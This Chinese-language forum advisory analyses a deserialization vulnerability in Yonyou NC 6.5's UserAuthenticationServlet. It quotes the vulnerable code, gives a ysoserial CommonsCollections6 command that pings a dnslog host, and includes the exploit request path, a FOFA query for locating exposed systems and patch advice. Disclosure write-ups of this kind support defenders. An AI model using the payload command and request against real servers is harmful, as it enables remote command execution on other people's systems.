奇安信攻防社区-用友NC UserAuthenticationServlet反序列化漏洞分析

用友NC UserAuthenticationServlet反序列化漏洞分析

## 一、漏洞简介用友NC系统`UserAuthenticationServlet`方法存在反序列化漏洞，攻击者可执行任意命令，获取敏感信息。 ## 二、影响版本用友NC6.5 ## 三、漏洞原理分析漏洞位...

一、漏洞简介
------

用友NC系统`UserAuthenticationServlet`方法存在反序列化漏洞，攻击者可执行任意命令，获取敏感信息。

二、影响版本
------

用友NC6.5

三、漏洞原理分析
--------

漏洞位于`UserAuthenticationServlet`接口处，在包名称为`uapim`的目录下，完整路径为`nc.bs.pub.im.UserAuthenticationServlet`，代码如下

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-6d04500d829fa3269ff53cdc4301125e4bd38790.png)

这里就不贴完整的代码了，关键的代码方法如下

```php
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {  
    ObjectInputStream in = new ObjectInputStream((InputStream)request.getInputStream());  
    HashMap<Object, Object> headInfo = new HashMap<>();  
    ObjectOutputStream oos = null;  
    oos = new ObjectOutputStream((OutputStream)response.getOutputStream());  
    HashMap<Object, Object> resultMap = new HashMap<>();  
    try {  
      headInfo = (HashMap<Object, Object>)in.readObject();
```

此次POST请求时，读取了输入流，之后对输入流方法进行`in.readObject()`造成了反序列化漏洞

来到具体的请求URL上面，要调用`UserAuthenticationServlet`类，只要在请求路由加上`/~包名称`+`UserAuthenticationServlet`类的完整路径即可

查看系统的`Web.xml`，可以看见请求`/service`和`/servlet`前缀的都经过`NCInvokerServlet`方法处理

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-98dac0091ac31364fbaf5df501bf38c2c42797b4.png)

`NCInvokerServlet`方法主要功能是获得url路径后，如果是以`/~`开头，截取第一部分为`moduleName`，然后再截取第二部分为`serviceName`，再根据`getServiceObject(moduleName, serviceName)`实现任意Servlet的调用。

这里包名称是`uapim`，再加上方法的完整路径就能进行请求了

回到漏洞，这里测试使用`ysoserial-all.jar`生成`cc6`的利用链请求dnslog，保存到本地的c.bin文件中

```php
java -jar ysoserial-all.jar CommonsCollections6 "ping rce.a2mruo.dnslog.cn" > c.bin
```

再读取c.bin文件请求即可

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-a93a8800db52d1769245600fdb63f3b05a107693.png)

请求体如下

```php
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
Host: 
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

反序列化内容
```

接收到请求验证漏洞

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-e6319af46e6c6e014fa27e026e53afef8c5bcdea.png)

四、总结
----

用友NC系统`UserAuthenticationServlet`接口的方法中直接解析输入流造成了反序列化漏洞，攻击者可以构造执行任意的命令。

五、资产测绘
------

FOFA语法

```php
app="用友-UFIDA-NC"
```

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-25ad054ba770302b0ff4a7c6d1202cd0ba99d078.png)

六、漏洞复现
------

POC

反序列化POC
```

这里用`ysoserial-all.jar`生成`cc6`的利用链请求dnslog，保存到本地的c.bin文件中

```php
java -jar ysoserial-all.jar CommonsCollections6 "ping rce.a2mruo.dnslog.cn" > c.bin
```

再读取c.bin文件请求即可

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-d21f006c94e547dd774aced10014a2429df5b41f.png)

接收到请求记录

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-f0999f1442ff6dc809e61e35cf98c33b877212b5.png)

七、修复建议
------

安装用友NC最新的补丁并更新到最新版本，对接口添加身份信息验证并修改对应的方法逻辑。

发表于 2025-07-08 09:39:45
阅读 ( 135 )
分类：OA产品

用友NC UserAuthenticationServlet反序列化漏洞分析

0 条评论